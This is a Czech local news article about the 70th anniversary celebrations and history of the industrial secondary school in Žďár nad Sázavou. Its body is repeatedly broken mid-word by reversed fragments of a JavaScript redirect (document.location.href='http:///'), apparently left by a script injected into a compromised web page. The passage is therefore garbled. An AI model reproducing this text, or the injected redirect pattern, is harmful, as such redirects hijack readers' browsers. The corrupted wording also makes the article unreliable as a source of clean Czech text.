Rainbow page separator

Průmyslovka slaví 70. výročí dnem otevřených dveří i plesem

Pátek, 22. října 2021

Žďár nad Sázavou / Projít si znovu školní budovy nebo internáty a zavzpomínat na svoje školní léta dostanou možnost v sobotu 23. října bývalí studenti žďárské průmyslovky, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti oslav 70. výročí vzniku vzdělávacího zařízení. Oslavy se dotknou také pracoviště ve Strojírenské ulici – někdejšího učiliště firmy ŽĎAS, které bylo s průmyslovou školou administrativně sloučeno v roce 2014. Tam se slavnostní zahájení slovem ředitele uskuteční od 9 hodin, v objektu průmyslovky ve Studentské ulici [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude o hodinu později. Poté si už zájemci budou moci až do 14 hodin prohlédnout školu a sami posoudit, co všechno se od dob jejich studia změnilo. Pro ty třídní kolektivy, které si předem zajistily vstupenky, je od 19 hodin v Domě kultury připravený společenský ples, při kterém k tanci i poslechu zahraje kapela 4Sýkorky.
Žďárská průmyslovka – původně Vyšší průmyslová škola – byla ve Žďáře nad Sázavou otevřena v roce 1951 a vznikla ve stejném roce jako největší strojírenský podnik ve městě i celém regionu, kterým se stal ŽĎAS. Škola měla za úkol vychovávat techniky-odborníky, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jak pro ŽĎAS, tak i pro další závody podobného zaměření, neboť se jednalo o jedinou školu podobného typu v regionu. Budova průmyslovky je však o něco mladší – její stavba byla zahájena až o tři roky později, takže v první fázi se studenti učili v náhradních pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách, například také v sokolovně nebo ve lnářské škole, přičemž podobné [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo i s uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továním studentů z větší dálky.